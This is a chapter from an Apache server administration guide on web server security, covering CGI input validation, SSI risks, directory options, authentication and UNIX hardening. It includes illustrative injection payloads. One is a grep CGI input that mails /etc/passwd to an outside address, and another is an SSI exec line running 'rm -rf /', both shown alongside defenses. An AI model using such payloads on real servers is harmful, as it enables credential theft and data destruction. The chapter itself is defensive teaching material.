Chapter 16: Web Server Security Issues

Apache Server Survival Guide

Web Server Security Issues

Throughout this book I have not discussed the security implications of running a Web server mainly because I wanted to focus all this vital information into a single chapter. My thinking is that by putting all security information together, it would be much easier for you to read and reference. While other chapters may have made a reference to security, they didn't address it. This chapter does.

More than likely after you read this information, you'll be worrying about a few things. That's good. You should worry. While at times I may sound paranoid, take it with a grain of salt. The level of security you implement should reflect the level of security that you need. Creating a secure network is a very extensive topic, and one that changes constantly. This chapter will focus closely on the issues that affect a Web server; general network security is touched on but not really addressed.

Why Security?

Connecting a computer to the Internet is a very exciting event. It opens up a world of information and communication. By setting up a Web server, you have plugged into that world and transformed yourself into an information provider. The only trouble is that by doing so you have just exposed your network to a series of potential security problems. These dangers are packaged in many forms, including the following:

Unauthorized use of your computing resources
Denial of service attacks
Information theft
Vandalism

Any one of these dangers is cause for concern, but knowing how each works will help you prepare for it.

Before you go any further, you should think about dedicating a system to serving Web pages. This system should be a bare-bones machine: It should have no user accounts and contain minimal software. It also should not be directly on your local area network (LAN). If you haven't set up a firewall yet, do it. A firewall isolates your network from the Internet, which is a smart thing to do.

Unauthorized Use of Computing Resources

Many of the attacks on a network have obtaining illicit use of your systems as their goal. These attackers will try to seize control of your system using its resources for whatever they see fit. While on the surface this seems like the least harmful of problems, these attackers can create serious problems that could even affect your reputation. For one, your systems could become the home base from which to launch attacks onto other networks. They could turn your computers into illegal software distribution depots by distributing copies of copyrighted or pornographic material right from your systems!

Denial of Service Attacks

Denial of service attacks are designed to keep you from using your own computing resources. Some of the attacks can capitalize on known vulnerabilities of your operating system, such as flooding your system with so much e-mail that it cannot keep up with other legitimate requests. Intruders can also shut down your equipment, affecting services that are available to other users of your network. Sometimes this sort of attack is part of a well-orchestrated attack towards another system. By making a trusted system unavailable, an attacker could make another computer masquerade as your trusted host and gain access to a different machine.

Information Theft

Information theft may be a serious problem if you store sensitive information on your systems. Even if you don't, the information gathered could be used to gain further access to your system or personal information that should be kept private. Confidential information, be it your secret formula for lemonade or your banking records, should not be anyone's business but your own.

Vandalism

This is probably the most annoying of all attacks. A vandal will attempt to destroy information that you keep on your computer. Your best survival technique is simple: Have a backup of your data! Why would someone do this? Usually it's a personal attack by a disgruntled employee or someone else who somehow thinks they have a score to settle.

How Do They Get In?

People who break into computers do it by exploiting some sort of software weakness. Usually, this is a bug in some program or library. Many years back, sendmail, the mail transfer agent that delivers mail on most UNIX machines, was the target of one of these attacks. The sendmail worm exploited known bugs, and while it did no damage to data, it managed to consume all the resources of the affected computers. The worm invaded thousands of computers in just a few hours.

If you see what I am getting at, most security problems are rooted in software bugs. This is why it is extremely important that your software is kept up-to-date. Systems that are running old software are more likely to be broken into because they contain bugs and problems that are known.

Unlike PCs and Macintoshes, UNIX systems offer a wide range of services. For example, if you tried to FTP into a Mac or a PC, you would not be able to do it unless the user installed a program that supported this protocol. Under UNIX, this and many other client/server programs are already installed and waiting for a connection. For a list of what is running on your system, check your /etc/inetd.conf file.
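As a rough illustration of that check, the following Python sketch lists the services that are enabled in an inetd-style configuration. The function name enabled_services and the sample text are made up for this example. It assumes the usual layout, in which each active line begins with the service name and disabled entries are commented out with #.

```python
def enabled_services(conf_text):
    """Return the service names found on active (uncommented) lines."""
    services = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and disabled entries
        services.append(line.split()[0])  # first field is the service name
    return services


# Hypothetical sample; on a real host you would read /etc/inetd.conf instead.
SAMPLE = """\
ftp     stream  tcp  nowait  root    /usr/sbin/ftpd     ftpd
#telnet stream  tcp  nowait  root    /usr/sbin/telnetd  telnetd
finger  stream  tcp  nowait  nobody  /usr/sbin/fingerd  fingerd
"""
```

Calling enabled_services(SAMPLE) reports only the entries that are actually listening, which is the list you want to trim.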

Even if you don't know anything about plumbing, you can easily understand that the more complicated the plumbing, the easier it is to clog a drain. Software is not any different. The more complicated a program is, the more likely that it has bugs. Web servers are complicated programs, and your UNIX box is full of many complex programs, including shells and interpreters.

Thankfully, Apache doesn't have any known security problems. A basic configuration setting is fairly secure because it doesn't permit the execution of CGI programs or Server Side Includes. If you forget for a minute about all the other potential problems outside of your Web server, you will find that the source of security problems on a Web server is usually you, the administrator. Here's a list of the possible holes you can open:

Insecure CGI programs you write or insecure programs others write that get placed into your server.
Permissive and promiscuous security policies you set; this allows other users or uninvited guests to override your security policies. This refers to permitting the use of per-directory access files (.htaccess).
Additional server features that you enable. Unless you know what those third-party modules do and how they have been coded, it is difficult to see if any of them will cause you grief. The best defense is to run a minimal server: one that supplies the absolute minimum level of facilities that do what you need. This approach has the added benefit of making your server lighter in weight, which translates into a faster and more responsive server.

You should be able to tell that I am emphasizing (and maybe putting my foot in my mouth) that Apache, from a software standpoint, is fairly secure. No known bugs have severe security implications in the current version, and if one were discovered, the Apache team would be quick to rectify the situation. Always run the latest and greatest software to avoid problems.

From a Web server standpoint, your worries should focus on CGI and SSI because these two powerful features usually process user data. If you trust that the input data is good, you are in for trouble.

My first recommendation is that you should carefully evaluate any CGIs you have written. Your CGIs should be coded defensively because unexpected input will cause problems. This simply means that the information your CGI takes in should not be trusted and must be qualified before it is passed to another program for execution.

Data sent by a visitor via a form should be digested carefully. Just because input is generated by a form that you coded doesn't mean that the visitor didn't alter your form in an attempt to crash your program. Perhaps they returned different values or more data than what you expected. Their intent is to capitalize on a weakness, such as overflowing your CGI. Perhaps a path specification is different from what you would normally expect.

What your CGI can receive could be anything. Maybe through their e-mail address there's an attempt at getting your computer to do something else. Unless you are ready to cope with that possibility, you are creating a huge security risk.

Avoiding Bad Input

Here's what you should keep in mind regarding filenames:

Filenames you code are OK.
Filenames sent by a form or coded by others are not.
Restrict the files that others can supply to you. Perhaps have your program only access files that you explicitly permit.
Your CGI programs should be able to gracefully handle a missing temporary file. Perhaps your CGI programs should be able to determine if the file they are opening is the one they thought it was.
Filenaming. Keep it simple: Only allow filenames that use letters and numbers. Any other character is suspicious. Spaces or other whitespace in a filename can introduce problems. This also means that under UNIX, you really don't want files that start with periods (.), semicolons (;), or dashes (-). Files that include any of the shell metacharacters should not be permitted. Metacharacters are characters like * or ?, which have a special meaning to a shell.
File permissions. Temporary files should not be world readable or writable, since this allows users from within your organization to read information that they perhaps should not. This is one reason to have your server run as a special user such as 'httpd,' so that you can assign a reasonable umask. The umask (the user mask) sets the default permissions for the files you create. The easiest way to calculate a umask is to subtract the permissions you want from 777.
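The filename rules in the list above can be sketched in a few lines. This is only an illustration in Python, not code from any particular CGI library. The names SAFE_NAME, ALLOWED_FILES, and is_safe_filename, the 64-character limit, and the two permitted filenames are all assumptions made for the example.

```python
import re

# Letters and digits only, as the list recommends. The length cap is an
# extra assumption of this sketch.
SAFE_NAME = re.compile(r"[A-Za-z0-9]{1,64}")

# Hypothetical allow-list of the files this CGI is permitted to open.
ALLOWED_FILES = {"phonebook", "guestbook"}


def is_safe_filename(name):
    """True only for a purely alphanumeric name that is explicitly permitted."""
    # fullmatch() rejects anything with extra characters, including a
    # trailing newline, a leading dot or dash, slashes, and metacharacters.
    return bool(SAFE_NAME.fullmatch(name)) and name in ALLOWED_FILES
```

Checking against an explicit list as well as a character pattern means that a name which merely looks harmless is still refused unless you decided in advance to serve it.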

If you want your files to be readable, writable, and executable by you and no one else, you need to set your file mode to 700 (I added 400+200+100 from the following table). To create a umask that corresponds to this file mode, subtract 700 from 777. This leaves you with a umask of 77. Typically, you specify umasks with a 0 for the owner digit because you want to keep full permissions, including execute, on the directories and executables you create; thus you would specify a umask value of 077.
Permissions under UNIX take the following bits, which you can add or subtract to arrive at the permissions you want.

Bit Mode	Significance
4000	Set user ID on execution
2000	Set group ID on execution
1000	Set sticky bit*
0400	Read by owner
0200	Write by owner
0100	Execute (search in directory) by owner
0040	Read by group
0020	Write by group
0010	Execute (search in a directory) by group
0004	Read by others
0002	Write by others
0001	Execute by others

*When set, unprivileged users cannot delete or rename files of other users in that directory
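The umask arithmetic described above can be checked with a short Python sketch. The system applies a umask by clearing bits rather than by subtracting, but for cases like 777 minus 700 both give the same answer. The function names umask_for and apply_umask are made up for this example.

```python
def umask_for(mode):
    """Return the umask that leaves exactly the bits in mode permitted."""
    return 0o777 & ~mode


def apply_umask(requested, umask):
    """Permissions a new file ends up with: requested bits minus masked bits."""
    return requested & ~umask
```

For example, umask_for(0o700) is 0o077, and a program that asks for mode 666 under that umask gets apply_umask(0o666, 0o077), which is 0o600: read and write for the owner and nothing for anyone else.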

Securing Your CGI

The main problem with CGIs is passing user variables when executing an exec() or system() call. These variables, if not carefully watched, could contain shell metacharacters that will cause the shell to do something other than what was intended.

Suppose you have a simple script that uses the UNIX utility grep to search the contents of a phone database. The user enters a first or last name, and the script returns any matching items. The script does most of its work like this (please note that Perl has much better, built-in ways of doing this). Here's the script:

system("grep $pattern database");

The pattern variable is set from a form input by the user. Now see what would happen if the user entered a line like the following:

"-v ffffffff /etc/passwd |mail someAddress"

This effectively would send your /etc/passwd file via e-mail to someAddress. The -v argument to grep tells it to include all lines that don't match. Our matching pattern ffffffff more than likely won't match anyone.

The real solution to this type of problem is to do several things. One easy way of dealing with this problem is by making a call to system a little differently:

system("/bin/grep", $pattern, "database");

By doing this, you have eliminated the call to a shell, which would have interpreted the pipe and done something you didn't want. A pattern that begins with a dash could still be read by grep as an option; placing grep's -e flag before the pattern prevents that. Alternatively, you could have escaped each special shell character before passing it to the grep call, as this Perl code shows:

$pattern =~ s/([^\w])/\\$1/g;   # put a backslash in front of every non-word character
system("grep \"$pattern\" database");
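For comparison, here is how the same two defenses might look in Python. This is a sketch rather than a drop-in replacement for the Perl above. The function names grep_argv and grep_shell_command are invented for the example, and the database filename is the one used in the text.

```python
import shlex


def grep_argv(pattern, database="database"):
    """Argument list for grep that never passes through a shell.

    -e marks the next argument as the pattern even if it starts with a dash,
    and -- ends option parsing before the filename.
    """
    return ["grep", "-e", pattern, "--", database]


def grep_shell_command(pattern, database="database"):
    """One shell command string with both values quoted by shlex.quote()."""
    return "grep -e {} -- {}".format(shlex.quote(pattern), shlex.quote(database))
```

The list form is the safer of the two: handing it to subprocess.run(grep_argv(user_input)) starts grep directly, so a pipe character in the input is just another character in the pattern. The quoted string is only needed when a shell cannot be avoided.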

Perl has built-in checks for shell metacharacters and other expressions that could spell trouble. To enable this feature, just start your Perl scripts with #!/usr/local/bin/perl -T.

This will enable Perl's taint checks. Data from outside the program (environment variables, the standard input stream, or program arguments) cannot be used in eval(), exec(), system(), or piped open() calls. Any program variable that obtains a value from one of these sources also becomes tainted and cannot be used either. In order to use a tainted variable, you'll need to untaint it. Untainting requires that you perform a pattern match on the tainted variable and extract the matched substrings. To untaint an e-mail address, use the following code:

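$email =~ /^([\w.-]+\@[\w.-]+)$/ or die "Suspicious e-mail address\n";
$email = $1;   # the captured substring is no longer tainted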
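Python has no taint mode, but the same idea of accepting only what a pattern extracts can be sketched there too. The pattern below uses the same character classes as the Perl line above. The names EMAIL and clean_email are made up for this example, and rejecting the input outright when it doesn't match is a choice made for this sketch.

```python
import re

# Word characters, dots, and dashes on either side of a single @ sign.
EMAIL = re.compile(r"[\w.-]+@[\w.-]+")


def clean_email(raw):
    """Return the address if the whole input matches, otherwise None."""
    match = EMAIL.fullmatch(raw)
    return match.group(0) if match else None
```

Because the whole input must match, an address followed by a semicolon and a command is rejected rather than trimmed.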

Server Parsed HTML (SSI) Security Issues

Server Parsed HTML (SPML), also known as Server Side Includes (SSI), provides a convenient way of performing server-side processing on an HTML file before it is sent to the client. This allows for the opportunity to introduce some dynamic features without having to program a CGI to provide the functionality.

SPML documents are processed by the server before they are sent to the client. Only documents with a MIME type text/x-server-parsed-html or text/x-server-parsed-html3 are parsed. The resulting HTML is given a MIME type text/html and is sent back to the client.

SPML can include information such as the current time, can execute a program, or can include a document, just by adding some special SPML commands to your HTML page. When the HTML page is properly identified to the server as containing SPML tokens, the server parses the file and sends the results to the client requesting it. While this seems rather innocuous, it isn't. SSIs are parsed like a script and can be a source of grief.

File inclusion is not usually a problem, as long as users are not including sensitive files such as /etc/passwd. One condition to watch for is SSI pages that are built from data provided by a user over the Web. Suppose that you created a bulletin board SSI that would include items added by external users via a CGI. If your CGI was not smart enough to check what it is being handed, a user could add something nasty, such as the line <!--#exec cmd="/bin/rm -rf /" -->. This, as you guessed, would attempt to remove all files on your disk. Obviously, the example is intended as an illustration.
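One way a bulletin board CGI could defend itself is to escape markup characters before it writes a visitor's text into a page the server will parse. The sketch below is in Python and uses the standard html module. The function name sanitize_for_ssi_page is invented for this example.

```python
import html


def sanitize_for_ssi_page(user_text):
    """Escape markup so the text cannot form an SSI directive or an HTML tag."""
    # html.escape() rewrites &, <, and >, and with quote=True also " and '.
    return html.escape(user_text, quote=True)
```

Once the opening angle bracket has been turned into &lt;, the server no longer sees a directive to parse, and the visitor's text is displayed literally instead of executed.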

Security and Permissions

Exercising security on your Web site means enforcing policies. If you happen to allow per-directory access files, in a way you have relinquished some control over the implementation of that policy. From an administrative point of view, it is much better to manage one global access file (conf/access.conf) with many different entries than a minimal global configuration file plus hundreds of per-directory access files.

Per-directory access files also have the terrible side effect of slowing down your server considerably because, once enabled, your server will scan each directory in the path to a request. If found, it then needs to figure out what options to apply and in what order. This takes time.

The Options Directive

Permissions are specified in <Directory> sections in the global access control file or on a per-directory basis with .htaccess files. The Options directive specifies what server options are enabled for that particular server domain. Here are some of the options:

All	Enables all options except MultiViews.
ExecCGI	Enables the execution of CGI programs.
FollowSymLinks	Enables the traversing of symbolic links.
Includes	Enables the use of SSI.
IncludesNOEXEC	Enables the use of SSI with the following restrictions: The #exec command and #include of CGI scripts are disabled.
Indexes	Enables the return of a server-generated directory listing for requests where there is no DirectoryIndex file (index.html).
MultiViews	Enables content negotiation based on document language. See the LanguagePriority directive in Chapter 10, "Apache Modules."
SymLinksIfOwnerMatch	The traversing of symbolic links is allowed if the target file or directory is owned by the same user as the link. This setting offers better security than the FollowSymLinks option.
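As an illustration of how these options fit together, a conservative section in the global access file might look like the following. The directory path is hypothetical, and the particular combination of options is only one reasonable choice, not a recommendation for every site. AllowOverride None tells the server to ignore per-directory .htaccess files below this directory.

```apache
# Hypothetical document root; adjust the path for your own installation.
<Directory /usr/local/etc/httpd/htdocs>
Options SymLinksIfOwnerMatch IncludesNOEXEC
AllowOverride None
</Directory>
```

Because ExecCGI and Indexes are not listed, CGI programs will not run from this tree and the server will not generate directory listings for it.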

The following is a list of the security issues raised by the Options directive. Relevance to your particular application depends on what type of site you manage.

ExecCGI

On my site, the option to run CGIs on a directory other than cgi-bin doesn't pose many security risks because I control all CGI programs on the server. However, if you have a melange of users, permitting execution of CGIs from anywhere may be too permissive and is a way of asking for trouble.

FollowSymLinks

The FollowSymLinks option is another option to worry about. If a user is able to create a link to a directory from inside your Web document tree, she's just created an alternative way of navigating into the rest of your filesystem. You can consider this option as an easy way to publish your entire disk to the world. The SymLinksIfOwnerMatch option tries to mitigate this risk a bit. However, both of these options are very dangerous if your ship is not a tight one.

Includes

Includes allows the execution of SSI in the directory. This option can be tamed by specifying the IncludesNOEXEC option instead, which still permits SSI but keeps your users from executing programs from within an include statement.

Indexes

This feature can be abused easily. If you recall the discussion about FollowSymLinks, automatic indexes go hand-in-hand with it. When a visitor travels to a directory that doesn't contain a user-generated index file, one gets generated by the server if you have automatic indexing enabled. This basically provides a nice listing of your files and a nice interface with which to retrieve them.

Access Control

Apache provides you with several methods of authenticating users before you grant them access to your materials. Third-party modules provide support for an even greater number. You can authenticate using cookies, SQL databases, flat files, and so on. You can also control access to your machine based on the IP address of the host requesting the documents. Neither of these methods provides a good measure of security by itself; however, together they are much more robust.

There are a few issues that should be mentioned before you rely on any of these methods.

Filtering By Address

Although looking at a machine's address to determine if it is a friendly computer is better than not doing it, any host can be spoofed. Some evildoers on the Net can configure their computers to pretend to be someone you know. Usually this is done by making a real host unavailable and then making the Domain Name System (DNS) provide the wrong information. For your security, you may want to enable -DMAXIMUM_DNS while compiling the server software (under Apache 1.1 there's a new directive HostnameLookups that does the same thing as a runtime directive). This will solicit a little more work on your computer because DNS information will need to be verified more closely. Typically, the server will do a reverse lookup on the IP address of a client to get its name. Setting up the HostnameLookups will force one more test. After the name is received, the server will query DNS for its IP address. If they both match, things are cool. Otherwise, the access fails.
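The two-step check described above (reverse lookup, then forward lookup, then compare) can be sketched in Python with the standard socket module. This is an illustration of the idea, not Apache's own code. The function name passes_double_lookup is made up, and the resolver functions are passed as parameters only so that the logic can be tried without a live DNS server.

```python
import socket


def passes_double_lookup(ip, reverse=socket.gethostbyaddr,
                         forward=socket.gethostbyname_ex):
    """Reverse-resolve ip to a name, then confirm the name maps back to ip."""
    try:
        hostname = reverse(ip)[0]         # (hostname, aliases, addresses)
        addresses = forward(hostname)[2]  # (hostname, aliases, addresses)
    except OSError:
        return False  # any lookup failure counts as a failed check
    return ip in addresses
```

A client whose address claims a trusted name passes only if that name, looked up independently, really points back at the same address.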

Login and Passwords

One problem with login and password verification over the Web is that an evildoer can have a ball at trying to crack a password. On many UNIX systems, if you tried this at a user account, the system would eventually disable access to the account, making it more difficult to break in. On the Web, you could try a few hundred passwords in a few seconds (with a little software) without anyone noticing it. Obviously, this doesn't present much danger, with the exception of obtaining access to private information, until you consider that most users use one password for most services.
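The account lockout that UNIX logins provide can be imitated in an authentication program of your own. The Python sketch below shows only the counting logic. The class name LoginThrottle and the default limit of five failures are arbitrary choices for the example, and a real version would also need to store its counters somewhere that survives between requests.

```python
class LoginThrottle:
    """Lock an account after too many consecutive failed logins."""

    def __init__(self, max_failures=5):
        self.max_failures = max_failures  # the threshold is an arbitrary choice
        self.failures = {}                # username -> consecutive failures

    def is_locked(self, user):
        return self.failures.get(user, 0) >= self.max_failures

    def record(self, user, success):
        """Update the counter; return True if the login may proceed."""
        if self.is_locked(user):
            return False  # even a correct password is refused once locked
        if success:
            self.failures.pop(user, None)  # a good login resets the count
            return True
        self.failures[user] = self.failures.get(user, 0) + 1
        return False
```

With a limit in place, a program that tries a few hundred passwords is stopped after the first handful instead of going unnoticed.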

Basic Authentication

Basic authentication is basic in that information exchanged between the browser and the server is not encrypted in any way. This method only encodes, not encrypts, the authentication session. Anyone that can intercept your authentication session can decode it and use the information to access your materials. The browser sends in authentication information with each request to the protected realm, which means that your login and password are sent not once, but several times through the wire.
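To see how little protection the encoding offers, consider this short Python sketch. It takes the value of a captured Authorization header and recovers the login and password with nothing more than a base64 decode. The function name decode_basic_auth is made up for the example.

```python
import base64


def decode_basic_auth(header_value):
    """Recover (login, password) from an 'Authorization: Basic ...' value."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    decoded = base64.b64decode(encoded).decode("utf-8")
    login, _, password = decoded.partition(":")  # split at the first colon
    return login, password
```

Given the header value "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==", the function returns the login Aladdin and the password open sesame. No key or secret is needed.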

To resolve this problem, a new method has been introduced: Digest authentication. Unlike Basic, Digest never sends the password itself. Instead, the browser sends an MD5 hash computed from the login, the password, a value supplied by the server (the nonce), and the requested resource, so the result is only valid for that resource. If someone captured the authentication information, it would only be useful to retrieve that one resource. Access to each page requires a new hash, which the browser generates. This makes the entire process a bit more secure.
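The calculation behind Digest authentication, as defined in RFC 2069, can be sketched in Python with the standard hashlib module. The function names md5_hex and digest_response are made up for this example, and the sketch leaves out the rest of the exchange, such as how the server issues the nonce.

```python
import hashlib


def md5_hex(text):
    """MD5 of a string, as lowercase hexadecimal."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(user, realm, password, method, uri, nonce):
    """Response value the browser sends in place of the password."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")  # secret part, never sent
    ha2 = md5_hex(f"{method}:{uri}")             # ties the hash to one request
    return md5_hex(f"{ha1}:{nonce}:{ha2}")
```

Because the requested URI is part of the hash, the value captured for one page does not match what the server expects for another.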

If you want to have truly secure access to your server and you don't want to send passwords in the clear, the only current viable solution is to use an SSL server, such as Stronghold or Apache SSL. Chapter 14, "Secure Web Servers," goes into great detail about these products. An SSL server ensures that information sent between the browser and the server is kept confidential. So even if someone is spying on the line, it is very difficult to recover the original information. Secure transactions also ensure that the data you receive originated from a trusted point.

Protecting UNIX

One way of reducing the likelihood of a problem is to reduce the number of potential sources of problems. In practice, this means reducing the number of software systems that could be subverted in an unexpected way: Your server should be as light as possible in the software department.

Your host should house the minimum number of users possible.
Your host should house only the necessary Internet services (see your /etc/inetd.conf file for services you are currently running). Remove services that are not needed.
Your host should be running the latest stable versions of the server programs, including sendmail, httpd, ftp, and so on.
The logfiles in your host should be checked often.

Additional Sources of Security Information

If you don't do much about security, the least you could do is frequently read the newsgroup comp.security.announce. This Usenet group carries posts from the Computer Emergency Response Team (CERT), which list security holes as they are found. The CERT home page (see Figure 16.1) can be found at http://www.cert.org.

Figure 16.1. The CERT Coordination Center's home page.

In addition to CERT advisories, you may want to check Internet Security Systems, Inc.'s home page (see Figure 16.2). It is located at http://www.iss.net. Its Web site has a nice mailing list and a vulnerability database for a variety of programs where security problems are grouped. Naturally, there's one for Apache too.

Figure 16.2. Internet Security Systems, Inc.'s home page.

There are many excellent books available that will provide more detail than you'll probably ever need. Here are a few:

UNIX Security for the Organization, by Richard Bryant, Sams Publishing.

Internet Firewalls and Network Security, by Karanjit Siyan, Ph.D. and Chris Hare, New Riders Publishing.

Building Internet Firewalls, by D. Brent Chapman and Elizabeth D. Zwicky, O'Reilly & Associates, Inc.

Practical UNIX Security, by Simson Garfinkel and Gene Spafford, O'Reilly & Associates, Inc.

Summary

The issues in this chapter only begin to address a few of the many configuration issues that may affect the security of your site. Security is a very complex issue. Because of UNIX and the networking necessary to make a Web server work, your task is a complicated one. I hope some of the warnings will point you in the right direction. And yes, while some of the examples are extreme, they were meant to catch your attention. The truth is you really cannot be sure of what can be done. Expect the unexpected, and prepare for disaster. This way, should you be unfortunate and have a security breach, you'll be prepared to deal with it from a practical, as well as an emotional, point of view.

Document any security problems you may find. If you think something is not right, document it. If you shut down your system, the intruder will know she's been had, and it will be very difficult for you to track her. On the other hand, if you wait and document, you may have a better chance of catching her and finding out her true identity.
